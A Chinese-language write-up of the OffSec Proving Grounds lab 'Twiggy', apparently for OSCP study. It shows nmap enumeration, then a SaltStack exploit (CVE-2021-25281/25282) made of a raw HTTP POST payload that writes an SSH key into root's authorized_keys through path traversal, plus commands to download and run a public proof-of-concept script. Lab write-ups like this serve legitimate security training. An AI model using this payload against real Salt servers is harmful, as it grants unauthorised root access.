OSCP Twiggy Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Twiggy

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界(获取管理员旗帜):

利用 CVE-2021-25281、CVE-2021-25282 写入私钥文件,获取系统 root 用户权限。

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
6
7
8
sudo nmap -p- 192.168.163.62 --min-rate=2000

PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
4506/tcp open  unknown
8000/tcp open  http-alt

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
sudo nmap -p22,53,80,4506,8000 -sCV 192.168.163.62

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
|   256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_  256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
8000/tcp open  http    nginx 1.16.1
|_http-title: Site doesn't have a title (application/json).
|_http-server-header: nginx/1.16.1
|_http-open-proxy: Proxy might be redirecting requests

系统为 Linux 环境,开放有 HTTP、SSH、ZMTP 服务。

3.2 渗透测试突破边界(获取用户旗帜)

3.2.1 SaltStack Salt 未授权漏洞远程写入私钥文件(CVE-2021-25281、CVE-2021-25282)

依次访问靶机开放的 80、4506 和 8000 端口,其中对 80 服务枚举过程未发现可利用漏洞(兔子洞),访问系统 8000 端口会返回一段 json 数据,依旧没有任何有价值发现。

搜索引擎检索 zmtp 4506,得知 4506 端口为 SaltStack Master 与 minions 通信的端口,8000 端口为 Salt 的 API 端口,再次检索 SaltStack exploit,发现可能存在 CVE-2021-25281、CVE-2021-25282 组合漏洞。

参考链接:

1
2
https://github.com/Immersive-Labs-Sec/CVE-2021-25281
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25281.yaml

根据链接说明,可尝试通过该漏洞写入私钥文件至靶机。

通过 Payload 写入:

1
2
3
4
5
POST /run HTTP/1.1
Host: xxxx
Content-Type: application/json

{"client":"wheel_async","fun":"pillar_roots.write","data":"私钥内容","path":"../../../../../../../root/.ssh/authorized_keys","username":"1","password":"1","eauth":"pam"}

使用链接脚本写入私钥:

1
wget https://raw.githubusercontent.com/Immersive-Labs-Sec/CVE-2021-25281/refs/heads/main/cve-2021-25281.py

注意: 此时需要修改脚本中的 URL 信息。

1
2
3
4
5
# 生成公私钥
authorized_keys

# py
python3 cve-2021-25281.py 192.168.163.62 ssh ~/.ssh/id_rsa.pub

使用 kali 私钥连接靶机,获取到系统 root 用户权限。

3.2.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨

OffSec OSCP
#Linux #CVE‑2021‑25281 与 CVE‑2021‑25282 漏洞组合利用
OSCP Twiggy Write-up
https://www.f0nesec.top/2025/08/19/oscp-twiggy/
作者
F0ne
发布于
2025年8月19日
许可协议